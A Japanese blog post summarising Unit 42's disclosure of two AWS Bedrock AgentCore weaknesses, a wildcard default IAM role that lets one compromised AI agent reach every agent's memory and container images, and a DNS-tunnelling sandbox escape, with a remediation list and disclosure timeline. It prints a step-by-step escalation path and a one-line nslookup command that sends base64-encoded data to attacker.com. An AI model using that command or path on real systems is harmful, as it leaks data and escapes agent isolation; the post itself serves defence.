0
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【緊急】AWSのAIエージェントが「神モード」で暴走できる脆弱性。あなたのBedrock環境は大丈夫?

0
Posted at

「1つのAIエージェントが乗っ取られたら、全エージェントのデータが盗まれる」

これ、冗談じゃなくて、AWSの公式ツールで起きる現実の話です。

結論から言うと

2026年4月8日、Palo Alto NetworksのUnit 42チームがAWS Bedrock AgentCoreに潜む2つの重大な脆弱性を公開しました。

  1. Agent God Mode — デフォルト設定で全エージェントのデータにアクセス可能
  2. Sandbox Escape — DNS経由でデータを外部に持ち出し可能

「AWSだから安全」と思ってAIエージェントをデプロイしている方、今すぐ設定を見直してください。

脆弱性①:Agent God Mode — 全能の神になれるIAMロール

何が起きているのか

AWS Bedrock AgentCoreのスターターツールキットが自動生成するIAMロールに問題があります。

{
  "Effect": "Allow",
  "Action": [
    "bedrock:InvokeAgentRuntime",
    "bedrock:GetMemory",
    "bedrock:RetrieveMemoryRecords",
    "bedrock:InvokeCodeInterpreter"
  ],
  "Resource": "*"   //  ここが問題
}

Resource: "*" — つまりワイルドカードです。

これにより、1つのエージェントが侵害されると:

  • 全エージェントの会話履歴が閲覧可能
  • ECRの全コンテナイメージをダウンロード可能
  • 他エージェントのメモリデータにアクセス可能
  • Code Interpreterを任意に実行可能

これは「バグ」ではなく「仕様」です。AWSはこれを「開発・テスト用の設定」と説明しています。

攻撃シナリオ

1. 攻撃者が1つのAIエージェントを侵害
      ↓
2. ECRから全コンテナイメージをダウンロード
      ↓
3. イメージからMemoryIDなどの設定情報を抽出
      ↓
4. 他エージェントのメモリにアクセス
      ↓
5. 顧客データ・機密情報を全て取得

たった1つのエージェントの侵害が、組織全体のAIインフラを崩壊させる。

脆弱性②:Sandbox Escape — DNSトンネリングでデータ流出

「サンドボックス」という名の幻想

「Code Interpreterはサンドボックスで隔離されているから安全」

そう思っていませんか?

Unit 42の研究者は、このサンドボックスをDNSトンネリングで突破できることを証明しました。

どうやって突破するのか

サンドボックスモードは多くのアウトバウンド通信をブロックしますが、DNS(AレコードとAAAAレコード)は許可しています。

攻撃者はこれを悪用:

# データをDNSサブドメインにエンコードして送信
nslookup $(echo "機密データ" | base64).attacker.com

実際に盗めたもの

研究者は概念実証で以下のデータを抽出することに成功:

  • S3バケットの一覧と内容
  • PII(個人識別情報)を含むCSVファイル
  • APIキーが記載されたJSONファイル
  • 機密性の高い財務データ

CVSSスコアは7.5〜8.1(High)と評価されています。

AWSの対応が衝撃的

  1. 2025年9月にHackerOne経由で報告
  2. AWSは問題を確認し、一時的な修正を適用
  3. その後、修正をロールバック
  4. 最終的に「修正しない」と決定

つまり、この脆弱性は今も存在しています

今すぐやるべき対策

1. 本番環境でデフォルトIAMロールを使わない

//  絶対にダメ
"Resource": "*"

//  必ずリソースを限定
"Resource": "arn:aws:bedrock:us-east-1:123456789:agent/my-specific-agent"

2. VPCモードに移行する

サンドボックスモードではなく、VPCモードを使用:

  • VPCエンドポイントで通信を制御
  • セキュリティグループでアクセス制限
  • Route 53 Resolver DNS Firewallで不審なDNSクエリをブロック

3. エージェントごとに別々のIAMロールを作成

# エージェントAのロール
agent-a-role → agent-aのリソースのみアクセス可能

# エージェントBのロール
agent-b-role → agent-bのリソースのみアクセス可能

4. ECRアクセスを必要なリポジトリに限定

{
  "Effect": "Allow",
  "Action": "ecr:GetDownloadUrlForLayer",
  "Resource": "arn:aws:ecr:us-east-1:123456789:repository/my-agent-only"
}

なぜこれが重要なのか

2026年、AIエージェントは爆発的に普及しています:

  • MCP(Model Context Protocol)が9700万インストール突破
  • 40%の企業がAIエージェントを本番導入
  • AIエージェントへのVC投資が2420億ドル

しかし、セキュリティは追いついていません。

先週発表された調査では:

企業の97%がAIエージェント関連のセキュリティ被害を予測
なのにセキュリティ予算はわずか6%

今回のAWS脆弱性は氷山の一角です。

タイムライン

日付 イベント
2025年9月 Sandbox Escape をHackerOneに報告
2025年11月17日 Agent God Mode をAWSに報告
2025年11月18日 AWSが調査開始を確認
2025年12月14日 AWSが追加情報を要求
2026年1月28日 AWSが説明を提供(修正しない方針)
2026年4月8日 Unit 42が一般公開

まとめ

  • Agent God Mode:デフォルトIAMロールでワイルドカード権限 → 全エージェントのデータが漏洩リスク
  • Sandbox Escape:DNSトンネリングでサンドボックスを突破 → 機密データを外部に送信可能
  • AWSの対応:「開発用の設定だから」と修正せず
  • 対策:本番では必ずカスタムIAMロールとVPCモードを使用

「AWSだから安全」という神話は崩壊しました。

あなたのBedrock AgentCore環境、今すぐ確認してください。


参考リンク

Cracks in the Bedrock: Agent God Mode

Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox

AWS Bedrock AgentCore Sandbox Bypass Enables Stealthy C2 and Data Exfiltration


この記事が参考になったらいいねストックをお願いします!🙏

**あなたの組織ではAIエージェントのセキュリティ対策、どうしていますか?**コメントで教えてください👇

0
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?